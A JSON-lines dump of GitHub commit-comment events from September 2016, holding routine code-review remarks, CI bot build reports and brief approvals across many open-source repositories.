{"id":"4562323040","type":"CommitCommentEvent","actor":{"login":"tpetr"},"repo":{"name":"HubSpot/Singularity"},"payload":{"comment":{"id":19019955,"position":null,"line":null,"path":null,"commit_id":"b6d6d43b9f9c9ed8da86a7796cb6697773794e38","created_at":"2016-09-14T14:32:08Z","updated_at":"2016-09-14T14:32:08Z","body":"🚢 "}},"created_at":"2016-09-14T14:32:08Z"}
{"id":"4562324785","type":"CommitCommentEvent","actor":{"login":"myexpr"},"repo":{"name":"dmallick/TDDDemo"},"payload":{"comment":{"id":19019964,"position":30,"line":30,"path":"src/test/java/com/tdd/checkout/CheckoutHandlerTest.java","commit_id":"745afae934c7fb590fedb8b90d9d2656931504f2","created_at":"2016-09-14T14:32:25Z","updated_at":"2016-09-14T14:32:25Z","body":"ideally if this is the test case you have written your code should have only been written for this test case and not anything else.. "}},"created_at":"2016-09-14T14:32:25Z"}
{"id":"4562328399","type":"CommitCommentEvent","actor":{"login":"myexpr"},"repo":{"name":"dmallick/TDDDemo"},"payload":{"comment":{"id":19019974,"position":11,"line":36,"path":"src/test/java/com/tdd/checkout/CheckoutHandlerTest.java","commit_id":"f906bb239e3c323e7405436d2fc80800e690d235","created_at":"2016-09-14T14:32:56Z","updated_at":"2016-09-14T14:32:56Z","body":"prefer enum.. PLease look it up,. They are first class objects and work very well.. "}},"created_at":"2016-09-14T14:32:56Z"}
{"id":"4562331344","type":"CommitCommentEvent","actor":{"login":"fb71"},"repo":{"name":"Polymap4/polymap4-p4"},"payload":{"comment":{"id":19019984,"position":75,"line":183,"path":"org.polymap.p4/src/org/polymap/p4/layer/LayersPanel.java","commit_id":"e1fc1ebda14268d4061131ebb201cd62ea44c6d2","created_at":"2016-09-14T14:33:25Z","updated_at":"2016-09-14T14:33:25Z","body":"Stimmt, das wirklich cool, dass du das gefunden hast. Das resolven ist ziemlich komplex. Der AllResolver hat noch eine zweite connectLayer() methode und da kommt gleich eine FeatureSource raus. Geht die?"}},"created_at":"2016-09-14T14:33:25Z"}
{"id":"4562331440","type":"CommitCommentEvent","actor":{"login":"Phatcat"},"repo":{"name":"Phatcat/mangos-wotlk"},"payload":{"comment":{"id":19019986,"position":6,"line":41,"path":"src/game/AI/GuardianAI.cpp","commit_id":"e4928d20a0680a68d73c8e41417cd3d9e0234c80","created_at":"2016-09-14T14:33:26Z","updated_at":"2016-09-14T14:33:26Z","body":"Or it can be in a permanent state of no movement, such as\r\n\r\nTarget Dummy\r\nAdvanced Target Dummy\r\nMasterwork Target Dummy\r\n\r\nthose kind of guardians should never follow anyone."}},"created_at":"2016-09-14T14:33:26Z"}
{"id":"4562331700","type":"CommitCommentEvent","actor":{"login":"hydra"},"repo":{"name":"cleanflight/cleanflight"},"payload":{"comment":{"id":19019988,"position":null,"line":null,"path":null,"commit_id":"2507b90a2827496fd9aae04624bc2a8aabbb64f3","created_at":"2016-09-14T14:33:29Z","updated_at":"2016-09-14T14:33:29Z","body":"Yeah, but it's already mis-using the TEMPEATURE variable as-is.  I thing the RIGHT thing to do here is to move the code out of the temperate slot into a custom slot and use a bitmask."}},"created_at":"2016-09-14T14:33:29Z"}
{"id":"4562333537","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19019993,"position":null,"line":null,"path":null,"commit_id":"7096d22b1442922f20a37c81ec92778ad6f7b467","created_at":"2016-09-14T14:33:44Z","updated_at":"2016-09-14T14:33:44Z","body":"os_2.0_develop_signal_slot_bug (kbenne) - i386-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-7096d22b1442922f20a37c81ec92778ad6f7b467-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-7096d22b1442922f20a37c81ec92778ad6f7b467-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-14T14:33:44Z"}
{"id":"4562338695","type":"CommitCommentEvent","actor":{"login":"superm1"},"repo":{"name":"timchen119/efivar"},"payload":{"comment":{"id":19020008,"position":null,"line":null,"path":null,"commit_id":"331e4102249987e93e88185ae9e3103b5a2b9404","created_at":"2016-09-14T14:34:32Z","updated_at":"2016-09-14T14:34:32Z","body":"Would you submit this upstream efivar as a pull request? I think it should be amenable."}},"created_at":"2016-09-14T14:34:32Z"}
{"id":"4562338718","type":"CommitCommentEvent","actor":{"login":"myexpr"},"repo":{"name":"dmallick/TDDDemo"},"payload":{"comment":{"id":19020010,"position":10,"line":35,"path":"src/test/java/com/tdd/checkout/CheckoutHandlerTest.java","commit_id":"f906bb239e3c323e7405436d2fc80800e690d235","created_at":"2016-09-14T14:34:32Z","updated_at":"2016-09-14T14:34:32Z","body":"Does this test case even pass??"}},"created_at":"2016-09-14T14:34:32Z"}
{"id":"4562342283","type":"CommitCommentEvent","actor":{"login":"vivekarvind"},"repo":{"name":"Russell91/TensorBox"},"payload":{"comment":{"id":19020020,"position":null,"line":null,"path":null,"commit_id":"be6a742702b38be0a4f92815b42edc59d32f583b","created_at":"2016-09-14T14:35:07Z","updated_at":"2016-09-14T14:35:07Z","body":"Hi Russell,\r\n\r\nJust a quick question on this commit and the future ones. I worked on your code few months back back (with the idl file format), trying to reproduce the results of your paper, which I did successfully. I've tried the same thing in recent times but the TUD_Brussels dataset doesn't have json file format and because of this I'm unable to train the network. The latest version of the code doesn't work anymore with idl files or am I missing something? Please let me know. \r\n\r\nThanks."}},"created_at":"2016-09-14T14:35:07Z"}
{"id":"4562342300","type":"CommitCommentEvent","actor":{"login":"Phatcat"},"repo":{"name":"Phatcat/mangos-wotlk"},"payload":{"comment":{"id":19020021,"position":14,"line":48,"path":"src/game/AI/GuardianAI.cpp","commit_id":"e4928d20a0680a68d73c8e41417cd3d9e0234c80","created_at":"2016-09-14T14:35:07Z","updated_at":"2016-09-14T14:35:07Z","body":"actually I havn't faced it, I moved this out of another AI that for sure didn't host mini pets anymore.\r\n\r\nI actually havn't summoned a mini pet for quite some time. I think I'll do so and check out what AI they get set, just to be sure.."}},"created_at":"2016-09-14T14:35:07Z"}
{"id":"4562344970","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/electron"},"payload":{"comment":{"id":19020027,"position":null,"line":null,"path":null,"commit_id":"f11c59281ed16e7c537f7292a530c2e326d14263","created_at":"2016-09-14T14:35:34Z","updated_at":"2016-09-14T14:35:34Z","body":"++"}},"created_at":"2016-09-14T14:35:34Z"}
{"id":"4562345931","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/electron"},"payload":{"comment":{"id":19020029,"position":null,"line":null,"path":null,"commit_id":"129689afcf75a0109be7924ada6d9d381d7a5ae2","created_at":"2016-09-14T14:35:42Z","updated_at":"2016-09-14T14:35:42Z","body":"++"}},"created_at":"2016-09-14T14:35:42Z"}
{"id":"4562346635","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/electron"},"payload":{"comment":{"id":19020031,"position":null,"line":null,"path":null,"commit_id":"425ad689491be878ab505df3a278ae909c8fd6b4","created_at":"2016-09-14T14:35:48Z","updated_at":"2016-09-14T14:35:48Z","body":"++"}},"created_at":"2016-09-14T14:35:48Z"}
{"id":"4562349269","type":"CommitCommentEvent","actor":{"login":"Phatcat"},"repo":{"name":"Phatcat/mangos-wotlk"},"payload":{"comment":{"id":19020041,"position":15,"line":36,"path":"src/game/AI/ReactorAI.cpp","commit_id":"e4928d20a0680a68d73c8e41417cd3d9e0234c80","created_at":"2016-09-14T14:36:15Z","updated_at":"2016-09-14T14:36:15Z","body":"But this is bad codestyle which hurts my eyes... Can't I make it our cmangos codestyle... ?"}},"created_at":"2016-09-14T14:36:15Z"}
{"id":"4562349604","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19020042,"position":null,"line":null,"path":null,"commit_id":"0c4fcb1ba837aa1e720c5b411927d4ee75f63368","created_at":"2016-09-14T14:36:19Z","updated_at":"2016-09-14T14:36:19Z","body":"++"}},"created_at":"2016-09-14T14:36:19Z"}
{"id":"4562351139","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19020048,"position":null,"line":null,"path":null,"commit_id":"7096d22b1442922f20a37c81ec92778ad6f7b467","created_at":"2016-09-14T14:36:34Z","updated_at":"2016-09-14T14:36:34Z","body":"os_2.0_develop_signal_slot_bug (kbenne) - Win64-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-7096d22b1442922f20a37c81ec92778ad6f7b467-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-7096d22b1442922f20a37c81ec92778ad6f7b467-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-14T14:36:34Z"}
{"id":"4562352278","type":"CommitCommentEvent","actor":{"login":"myexpr"},"repo":{"name":"dmallick/TDDDemo"},"payload":{"comment":{"id":19020053,"position":6,"line":85,"path":"src/test/java/com/tdd/checkout/CheckoutHandlerTest.java","commit_id":"bd87efc2334099dd23490681ca161be20145c6a5","created_at":"2016-09-14T14:36:44Z","updated_at":"2016-09-14T14:36:44Z","body":"how is this test even working..  The `totalPrice` in the code above seems to have been commented out.."}},"created_at":"2016-09-14T14:36:44Z"}
{"id":"4562353765","type":"CommitCommentEvent","actor":{"login":"stephenc222"},"repo":{"name":"stephenc222/Punch-the-Monkey"},"payload":{"comment":{"id":19020060,"position":null,"line":null,"path":null,"commit_id":"5868161b2279b105f08e9c4fe576b4ac6ef2c339","created_at":"2016-09-14T14:36:58Z","updated_at":"2016-09-14T14:36:58Z","body":"I was looking up best practices on web game application structure, and that's what I came across. Just a shot in the dark at project directory structure "}},"created_at":"2016-09-14T14:36:58Z"}
{"id":"4562354692","type":"CommitCommentEvent","actor":{"login":"myexpr"},"repo":{"name":"dmallick/TDDDemo"},"payload":{"comment":{"id":19020063,"position":10,"line":56,"path":"src/main/java/com/tdd/checkout/CheckoutHandler.java","commit_id":"f8a367d35bdbbb251c0ad985290ff95b3e680cb2","created_at":"2016-09-14T14:37:08Z","updated_at":"2016-09-14T14:37:08Z","body":"incosistent.. Dont you want to wrap else with a { } "}},"created_at":"2016-09-14T14:37:08Z"}
{"id":"4562354949","type":"CommitCommentEvent","actor":{"login":"deads2k"},"repo":{"name":"openshift/origin"},"payload":{"comment":{"id":19020064,"position":null,"line":null,"path":null,"commit_id":"5d911680c18c08a972d01c9c2b0f53d56128c751","created_at":"2016-09-14T14:37:11Z","updated_at":"2016-09-14T14:37:11Z","body":"lgtm, follow up card for removing our interface."}},"created_at":"2016-09-14T14:37:11Z"}
{"id":"4562356018","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/balrog"},"payload":{"comment":{"id":19020071,"position":null,"line":null,"path":null,"commit_id":"269dc9da4f4de35fc7625b8fddf5e0a4092a2968","created_at":"2016-09-14T14:37:22Z","updated_at":"2016-09-14T14:37:22Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#HUYQtwUKRwu9a-kw-9ICxA"}},"created_at":"2016-09-14T14:37:22Z"}
{"id":"4562356338","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/balrog"},"payload":{"comment":{"id":19020074,"position":null,"line":null,"path":null,"commit_id":"3132192ed250b0031d35b53ada457589d4e0f306","created_at":"2016-09-14T14:37:25Z","updated_at":"2016-09-14T14:37:25Z","body":"TaskCluster: @NinadBhat does not have permission to trigger tasks."}},"created_at":"2016-09-14T14:37:25Z"}
{"id":"4562356596","type":"CommitCommentEvent","actor":{"login":"myexpr"},"repo":{"name":"dmallick/TDDDemo"},"payload":{"comment":{"id":19020076,"position":null,"line":null,"path":null,"commit_id":"bd87efc2334099dd23490681ca161be20145c6a5","created_at":"2016-09-14T14:37:27Z","updated_at":"2016-09-14T14:37:27Z","body":"Incosistent intermittent commit.. "}},"created_at":"2016-09-14T14:37:27Z"}
{"id":"4562358886","type":"CommitCommentEvent","actor":{"login":"t4im"},"repo":{"name":"minetest/minetest_game"},"payload":{"comment":{"id":19020083,"position":31,"line":140,"path":"mods/stairs/init.lua","commit_id":"b848e35ca59c9eea3dbe3df87cb14d6bfea93f9a","created_at":"2016-09-14T14:37:48Z","updated_at":"2016-09-14T14:37:48Z","body":"Line 137 was likely supposed to be `get_node_or_nil` to handle **`CONTENT_IGNORE`**, i.e. to not have slabs delete other blocks under some conditions. The test would then be correct."}},"created_at":"2016-09-14T14:37:48Z"}
{"id":"4562361901","type":"CommitCommentEvent","actor":{"login":"Phatcat"},"repo":{"name":"Phatcat/mangos-wotlk"},"payload":{"comment":{"id":19020091,"position":17,"line":1388,"path":"src/game/AI/CreatureEventAI.cpp","commit_id":"e4928d20a0680a68d73c8e41417cd3d9e0234c80","created_at":"2016-09-14T14:38:17Z","updated_at":"2016-09-14T14:38:17Z","body":"I don't understand the need for a wrapper, are there other 'passive' like flags/states which could be checked for? - Also does PetAI even need that check anymore now that Guardians have moved into their own GuardianAI?"}},"created_at":"2016-09-14T14:38:17Z"}
{"id":"4562362983","type":"CommitCommentEvent","actor":{"login":"yanns"},"repo":{"name":"johanandren/futiles"},"payload":{"comment":{"id":19020092,"position":13,"line":13,"path":"src/main/scala/markatta/futiles/CallingThreadExecutionContext.scala","commit_id":"d74757d1078f8efd60b5935ac4f261ac3012e2d1","created_at":"2016-09-14T14:38:27Z","updated_at":"2016-09-14T14:38:27Z","body":"yes, I just checked and the usage seems to be safe."}},"created_at":"2016-09-14T14:38:27Z"}
{"id":"4562365258","type":"CommitCommentEvent","actor":{"login":"tangqiGit"},"repo":{"name":"tangqiGit/learnGit"},"payload":{"comment":{"id":19020094,"position":3,"line":3,"path":"readme.txt","commit_id":"9399acc2a5d37763ccd5914dfd73de467f0ec0c5","created_at":"2016-09-14T14:38:48Z","updated_at":"2016-09-14T14:38:48Z","body":"ssssss"}},"created_at":"2016-09-14T14:38:48Z"}
{"id":"4562367088","type":"CommitCommentEvent","actor":{"login":"kovidgoyal"},"repo":{"name":"atsepkov/RapydScript"},"payload":{"comment":{"id":19020099,"position":null,"line":null,"path":null,"commit_id":"de6ce95fa77d92320f8ea18cf1103561a06c68d1","created_at":"2016-09-14T14:39:07Z","updated_at":"2016-09-14T14:39:07Z","body":"Type annotations are (at least in python) a type of comment. Relying on them is dangerous. It can easily happen that a function is updated to handle different/extra types and the developer forgets to update the type annotation. \r\n\r\nAs for pointing out contract violations, that is fairly harmless, but, rather than raise an error, it should probably be made part of the linter. After all, I could have good reasons for doing 5 + ' stars'. The linter has the ability to suppress specific errors or specific lines which can come in handy for this kind of thing. "}},"created_at":"2016-09-14T14:39:07Z"}
{"id":"4562367764","type":"CommitCommentEvent","actor":{"login":"awhiemstra"},"repo":{"name":"Ultimaker/Uranium"},"payload":{"comment":{"id":19020102,"position":9,"line":171,"path":"UM/Settings/SettingInstance.py","commit_id":"9fa133da046af2504fd3681d6dfbedb3a46da008","created_at":"2016-09-14T14:39:14Z","updated_at":"2016-09-14T14:39:14Z","body":"Also note that this is Uranium. I suspect this is an accidental change and not intentional."}},"created_at":"2016-09-14T14:39:14Z"}
{"id":"4562370201","type":"CommitCommentEvent","actor":{"login":"rodrigotripp"},"repo":{"name":"rodrigotripp/streetfighter-starter"},"payload":{"comment":{"id":19020108,"position":null,"line":null,"path":null,"commit_id":"0b5a4ba7d295835fc284431215f3655ebee134e7","created_at":"2016-09-14T14:39:37Z","updated_at":"2016-09-14T14:39:37Z","body":"Street fighter"}},"created_at":"2016-09-14T14:39:37Z"}
{"id":"4562370839","type":"CommitCommentEvent","actor":{"login":"phl0"},"repo":{"name":"dg9vh/MMDVMHost-Dashboard"},"payload":{"comment":{"id":19020111,"position":null,"line":null,"path":null,"commit_id":"1098320ea1fbb1ebee2f8434aa245105059ee013","created_at":"2016-09-14T14:39:43Z","updated_at":"2016-09-14T14:39:43Z","body":"Kein Ding. Bin zufällig drüber gestolpert."}},"created_at":"2016-09-14T14:39:43Z"}
{"id":"4562373385","type":"CommitCommentEvent","actor":{"login":"Phatcat"},"repo":{"name":"Phatcat/mangos-wotlk"},"payload":{"comment":{"id":19020115,"position":7,"line":1269,"path":"src/game/AI/CreatureEventAI.cpp","commit_id":"e4928d20a0680a68d73c8e41417cd3d9e0234c80","created_at":"2016-09-14T14:40:10Z","updated_at":"2016-09-14T14:40:10Z","body":"that thought did cross my mind , I was just worried that mobs were still able to attack while having these states but I think m_creature->hasUnitState(UNIT_STAT_CAN_NOT_REACT) may be the redundant call here in that case."}},"created_at":"2016-09-14T14:40:10Z"}
{"id":"4562373398","type":"CommitCommentEvent","actor":{"login":"adam-vessey"},"repo":{"name":"Islandora/islandora_solution_pack_newspaper"},"payload":{"comment":{"id":19020116,"position":null,"line":null,"path":null,"commit_id":"819411579f1c0a53960c3d33dfa213ab748d6f63","created_at":"2016-09-14T14:40:10Z","updated_at":"2016-09-14T14:40:10Z","body":"Have you tried using something like `lsb_release -sc` (to get the name of the release), or `lsb_release -sr` (to get the version number of the release)? May be a more direct approach, compared to parsing files on our own."}},"created_at":"2016-09-14T14:40:10Z"}
{"id":"4562379143","type":"CommitCommentEvent","actor":{"login":"Phatcat"},"repo":{"name":"Phatcat/mangos-wotlk"},"payload":{"comment":{"id":19020125,"position":36,"line":148,"path":"src/game/AI/AggressorAI.cpp","commit_id":"e4928d20a0680a68d73c8e41417cd3d9e0234c80","created_at":"2016-09-14T14:41:08Z","updated_at":"2016-09-14T14:41:08Z","body":"Sure, I'll check. May as well move any applicaple check there as well."}},"created_at":"2016-09-14T14:41:08Z"}
{"id":"4562380654","type":"CommitCommentEvent","actor":{"login":"maheanagithub"},"repo":{"name":"maheanagithub/tallerprogramacion"},"payload":{"comment":{"id":19020129,"position":null,"line":null,"path":null,"commit_id":"fad2581c9b3f6688375dde8acdf820ba9ff3402a","created_at":"2016-09-14T14:41:21Z","updated_at":"2016-09-14T14:41:21Z","body":"cool"}},"created_at":"2016-09-14T14:41:21Z"}
{"id":"4562382823","type":"CommitCommentEvent","actor":{"login":"swert-hon"},"repo":{"name":"xamarin/xamarin-android"},"payload":{"comment":{"id":19020133,"position":null,"line":null,"path":null,"commit_id":"3675c5c6a6a5b9f0c65106e7ab5b08358c5fc82a","created_at":"2016-09-14T14:41:39Z","updated_at":"2016-09-14T14:41:39Z","body":"I would suggest using the [Uri.AbsoluteUri](https://msdn.microsoft.com/en-us/library/system.uri.absoluteuri(v=vs.110).aspx) property like so: 3a40c8e3d472eff0aa292e48f20b18b185f90e9d\r\n[Uri.OriginalString](https://msdn.microsoft.com/en-us/library/system.uri.originalstring(v=vs.110).aspx) will return the original string passed to the Uri constructor, while AbsoluteUri will perform the escaping that a consumer would expect the Uri class to perform for them (but nothing more)."}},"created_at":"2016-09-14T14:41:39Z"}
{"id":"4562387835","type":"CommitCommentEvent","actor":{"login":"crufter"},"repo":{"name":"gocassa/gocassa"},"payload":{"comment":{"id":19020147,"position":16,"line":102,"path":"modifiers.go","commit_id":"22654e2bb3b664ac2ba1dd4c50388493754c2436","created_at":"2016-09-14T14:42:26Z","updated_at":"2016-09-14T14:42:26Z","body":"Is this possible now due to a gocql/cassa improvement?"}},"created_at":"2016-09-14T14:42:26Z"}
{"id":"4562388377","type":"CommitCommentEvent","actor":{"login":"whyrusleeping"},"repo":{"name":"Kubuxu/go-reuseport"},"payload":{"comment":{"id":19020149,"position":39,"line":36,"path":"poll/poll_linux.go","commit_id":"4b71ff5b16ea069b290c5308e8248578a7cefb19","created_at":"2016-09-14T14:42:31Z","updated_at":"2016-09-14T14:42:31Z","body":"no need to lock here, we just created this thing."}},"created_at":"2016-09-14T14:42:31Z"}
{"id":"4562394881","type":"CommitCommentEvent","actor":{"login":"Phatcat"},"repo":{"name":"Phatcat/mangos-wotlk"},"payload":{"comment":{"id":19020159,"position":23,"line":308,"path":"src/game/AI/PetAI.cpp","commit_id":"ed06e77cb296f3858acde3c276e982ffdc1bf8c1","created_at":"2016-09-14T14:43:30Z","updated_at":"2016-09-14T14:43:30Z","body":"I thought m_creature was used on the 'meta-unit' of the pet? - the reason I want to do this check is because it is possible to 'petpossess' a player unit with in example, the gnomish mind control cap. "}},"created_at":"2016-09-14T14:43:30Z"}
{"id":"4562397057","type":"CommitCommentEvent","actor":{"login":"prathamesh-sonpatki"},"repo":{"name":"rails/rails"},"payload":{"comment":{"id":19020164,"position":null,"line":null,"path":null,"commit_id":"12d5c21031446686898d5bac924ff3e9e34b6a7d","created_at":"2016-09-14T14:43:48Z","updated_at":"2016-09-14T14:43:48Z","body":"Nice! Didn't know about `git_source`. We should port this to 5-0-stable as well because it also has `:git` fix https://github.com/rails/rails/pull/26475"}},"created_at":"2016-09-14T14:43:48Z"}
{"id":"4562397998","type":"CommitCommentEvent","actor":{"login":"jwf67"},"repo":{"name":"nanflasted/Tableau"},"payload":{"comment":{"id":19020168,"position":null,"line":null,"path":null,"commit_id":"fa50ca5a1dfeb1ebdfd780943235f5e44fcad0b3","created_at":"2016-09-14T14:43:58Z","updated_at":"2016-09-14T14:43:58Z","body":"They're licensed under our LLC, Unity Pro Developers"}},"created_at":"2016-09-14T14:43:58Z"}
{"id":"4562398846","type":"CommitCommentEvent","actor":{"login":"dancannon"},"repo":{"name":"gocassa/gocassa"},"payload":{"comment":{"id":19020173,"position":16,"line":102,"path":"modifiers.go","commit_id":"22654e2bb3b664ac2ba1dd4c50388493754c2436","created_at":"2016-09-14T14:44:08Z","updated_at":"2016-09-14T14:44:08Z","body":"Not as far as I can tell, it looks like this was always possible."}},"created_at":"2016-09-14T14:44:08Z"}
{"id":"4562400709","type":"CommitCommentEvent","actor":{"login":"lauralorenz"},"repo":{"name":"industrydive/dive_sailthru_client"},"payload":{"comment":{"id":19020177,"position":39,"line":39,"path":"dive_sailthru_client/client.py","commit_id":"d13c20a59bdc291fd6bd3d689b8f8ddfd9942f5e","created_at":"2016-09-14T14:44:26Z","updated_at":"2016-09-14T14:44:26Z","body":"this is from the original and these are local overrides anyway but its bad juju to overwrite the list() function"}},"created_at":"2016-09-14T14:44:26Z"}
{"id":"4562401851","type":"CommitCommentEvent","actor":{"login":"Legend286"},"repo":{"name":"opentomb/OpenTomb"},"payload":{"comment":{"id":19020181,"position":null,"line":null,"path":null,"commit_id":"121247f722b26e23b3e32b20b88a7d8ac4c8cafd","created_at":"2016-09-14T14:44:35Z","updated_at":"2016-09-14T14:44:35Z","body":"@Gh0stBlade @TeslaRus what the heck is wrong with the dependencies for this? Getting errors about libpng, SDL2, zlib, etc.. surely there should be some kind of information on the repo page mentioning how to compile this on windows with codeblocks without basically being thrown into the dark.. Would appreciate help, because it could be beneficial to the project for me to actually be able to compile the damn thing. I don't really use c++, or codeblocks, but I'm not stupid - I hope to implement deferred lighting and some other shadery stuff (and obviously I know enough about c++ to do that) but the thing that I've never been good with is getting things to compile when they have dependencies which, being a windows user, I don't have already installed and it's a minefield of complications to go about doing it properly on windows, but linux just works... Would appreciate the help."}},"created_at":"2016-09-14T14:44:35Z"}
{"id":"4562403386","type":"CommitCommentEvent","actor":{"login":"avigad"},"repo":{"name":"leanprover/lean"},"payload":{"comment":{"id":19020185,"position":11,"line":11,"path":"tests/lean/run/let3.lean","commit_id":"0b90ace9f8b284b7ef96d826a42842ac58dcadec","created_at":"2016-09-14T14:44:48Z","updated_at":"2016-09-14T14:44:48Z","body":"I'd read the example as \"obtain a, b, and c, and use it in the expression...\". \r\n\r\nThat said, ssreflect uses the word \"pose\" for that, e.g. \r\n```\r\npose (a, b, c) := p1 in\r\na + b + c\r\n```\r\nBut using the word \"obtain\" makes it clear that it is the same operation, and I think the uniformity is valuable."}},"created_at":"2016-09-14T14:44:48Z"}
{"id":"4562403782","type":"CommitCommentEvent","actor":{"login":"lauralorenz"},"repo":{"name":"industrydive/dive_sailthru_client"},"payload":{"comment":{"id":19020186,"position":65,"line":65,"path":"dive_sailthru_client/client.py","commit_id":"d13c20a59bdc291fd6bd3d689b8f8ddfd9942f5e","created_at":"2016-09-14T14:44:52Z","updated_at":"2016-09-14T14:44:52Z","body":"same as above: this is from the original and these are local overrides anyway but its bad juju to overwrite the list() function"}},"created_at":"2016-09-14T14:44:52Z"}
{"id":"4562404463","type":"CommitCommentEvent","actor":{"login":"jp-embedded"},"repo":{"name":"axypas/clippy.js"},"payload":{"comment":{"id":19020189,"position":null,"line":null,"path":null,"commit_id":"b8c623cca1609c71530458188c307f00a29b562a","created_at":"2016-09-14T14:44:58Z","updated_at":"2016-09-14T14:44:58Z","body":"Thanks."}},"created_at":"2016-09-14T14:44:58Z"}
{"id":"4562405480","type":"CommitCommentEvent","actor":{"login":"sblanco1"},"repo":{"name":"DavidPurcell/murano_temp"},"payload":{"comment":{"id":19020193,"position":82,"line":156,"path":"murano/tests/unit/common/test_plugin_loader.py","commit_id":"238e32ab2c2fe09c5f242a752b86d5d0451e8271","created_at":"2016-09-14T14:45:09Z","updated_at":"2016-09-14T14:45:09Z","body":"Add assertion\r\n"}},"created_at":"2016-09-14T14:45:09Z"}
{"id":"4562405498","type":"CommitCommentEvent","actor":{"login":"DavidPurcell"},"repo":{"name":"DavidPurcell/murano_temp"},"payload":{"comment":{"id":19020194,"position":82,"line":156,"path":"murano/tests/unit/common/test_plugin_loader.py","commit_id":"238e32ab2c2fe09c5f242a752b86d5d0451e8271","created_at":"2016-09-14T14:45:09Z","updated_at":"2016-09-14T14:45:09Z","body":"Add assert"}},"created_at":"2016-09-14T14:45:09Z"}
{"id":"4562409448","type":"CommitCommentEvent","actor":{"login":"martinwiboe"},"repo":{"name":"xamarin/xamarin-android"},"payload":{"comment":{"id":19020203,"position":null,"line":null,"path":null,"commit_id":"3675c5c6a6a5b9f0c65106e7ab5b08358c5fc82a","created_at":"2016-09-14T14:45:43Z","updated_at":"2016-09-14T14:45:43Z","body":"@swert-hon agreed, but how about relative urls? I'm not sure whether that's relevant in this context though, the HttpClient might convert them to absolute urls using its `BaseAddress` before calling the handler."}},"created_at":"2016-09-14T14:45:43Z"}
{"id":"4562411864","type":"CommitCommentEvent","actor":{"login":"Phatcat"},"repo":{"name":"Phatcat/mangos-wotlk"},"payload":{"comment":{"id":19020209,"position":null,"line":null,"path":null,"commit_id":"5d41f8e712315c7ecb6d78635e6a3de20ed1b653","created_at":"2016-09-14T14:46:03Z","updated_at":"2016-09-14T14:46:03Z","body":"You're right, this is an 'easy way out' ... sorry."}},"created_at":"2016-09-14T14:46:03Z"}
{"id":"4562412913","type":"CommitCommentEvent","actor":{"login":"jesec"},"repo":{"name":"jesec/android_kernel_samsung_universal8890"},"payload":{"comment":{"id":19020211,"position":28,"line":4952,"path":"kernel/sched/fair.c","commit_id":"bfc845e8870e35495e44ca38e8edcef2c0bb2e92","created_at":"2016-09-14T14:46:14Z","updated_at":"2016-09-14T14:46:14Z","body":"I see. I am working on EAS and my own N7 port these days.(also playing GTA OL ;))"}},"created_at":"2016-09-14T14:46:14Z"}
{"id":"4562414006","type":"CommitCommentEvent","actor":{"login":"jpinkstone"},"repo":{"name":"jpinkstone/Android-App"},"payload":{"comment":{"id":19020213,"position":null,"line":null,"path":null,"commit_id":"1cc81bb78cea31990632a9b99380b54b68687d03","created_at":"2016-09-14T14:46:25Z","updated_at":"2016-09-14T14:46:25Z","body":"I would leave the buttons the same. I was keeping everything modern and flat. No gradients"}},"created_at":"2016-09-14T14:46:25Z"}
{"id":"4562417209","type":"CommitCommentEvent","actor":{"login":"pillehu"},"repo":{"name":"php-fusion/PHP-Fusion"},"payload":{"comment":{"id":19020224,"position":null,"line":null,"path":null,"commit_id":"08887ef36c59caa0ae62a939cdd8207d19abb4e6","created_at":"2016-09-14T14:46:52Z","updated_at":"2016-09-14T14:46:52Z","body":"Thanks, I now this. It would be very usefull if PHP-fusion could also follow this pattern and work like this."}},"created_at":"2016-09-14T14:46:52Z"}
{"id":"4562418008","type":"CommitCommentEvent","actor":{"login":"aidanhs"},"repo":{"name":"alexcrichton/futures-rs"},"payload":{"comment":{"id":19020227,"position":125,"line":676,"path":"TUTORIAL.md","commit_id":"7172f735dbfa11942a76509565074ba8fdd0a5ab","created_at":"2016-09-14T14:46:59Z","updated_at":"2016-09-14T14:46:59Z","body":"Explicitly `spawn`ing onto the core rather than a magic `forget` method is a great change, just want to note my appreciation."}},"created_at":"2016-09-14T14:46:59Z"}
{"id":"4562418382","type":"CommitCommentEvent","actor":{"login":"deads2k"},"repo":{"name":"openshift/origin"},"payload":{"comment":{"id":19020229,"position":null,"line":null,"path":null,"commit_id":"c8b9ce47611cd6e9984f3b87c9ffaf2add600869","created_at":"2016-09-14T14:47:02Z","updated_at":"2016-09-14T14:47:02Z","body":"lgtm, boring"}},"created_at":"2016-09-14T14:47:02Z"}
